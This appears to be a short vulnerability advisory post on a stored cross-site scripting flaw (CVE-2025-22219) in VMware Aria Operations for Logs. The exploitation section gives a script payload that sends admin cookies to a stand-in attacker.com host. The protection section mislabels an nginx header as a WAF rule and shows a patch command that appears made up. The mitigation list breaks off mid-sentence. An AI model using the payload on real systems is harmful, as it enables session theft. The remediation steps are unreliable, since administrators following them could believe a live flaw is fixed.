VMware Aria Operations for Logs, Stored Cross-Site Scripting, CVE-2025-22219 (Critical)

Listen to this Post

🐢▶️ Listen🚀

How CVE-2025-22219 Works

VMware Aria Operations for Logs fails to properly sanitize user-supplied input in log entries, allowing a non-admin user to inject malicious JavaScript payloads. When an administrator views the compromised logs via the web interface, the script executes in their session, enabling privilege escalation. The attack persists due to stored XSS in the logging database, triggering upon each log review.

DailyCVE Form

Platform: VMware Aria Operations
Version: Logs 8.12.x
Vulnerability: Stored XSS
Severity: Critical
Date: 05/14/2025

What Undercode Say:

Exploitation:

1. Payload Injection:

<script>fetch(`https://attacker.com/steal?cookie=${document.cookie}`)</script>

Injected via log submission.

2. Admin Trigger:

Malicious script fires when admin accesses logs via /ui/logviewer.

3. Session Hijacking:

Attacker captures admin cookies for full control.

Protection:

1. Input Sanitization:

import bleach
cleaned_log = bleach.clean(raw_log, tags=[], attributes={})

2. VMware Patch:

sudo vRealize-log-manager --update --patch CVE-2025-22219

3. WAF Rules:

location /ui/logviewer {
add_header Content-Security-Policy "default-src 'self'";
}

4. Mitigation:

• Disable non-admin log submissions.
• Audit logs for `
  

  Manage Consent

  To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent may adversely affect certain features and functions.

  We do not sell your personal data. If you wish to exercise your rights under applicable privacy laws, please visit our Do Not Sell My Personal Information page.

  Functional Functional Always active

  The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.

  Preferences Preferences

  The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.

  Statistics Statistics

  The technical storage or access that is used exclusively for statistical purposes. The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.

  Marketing Marketing

  The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.

  Manage options Manage services Manage {vendor_count} vendors Read more about these purposes

  Accept Deny View preferences Save preferences View preferences

  {title} {title} {title}
  Manage consent
  Scroll to Top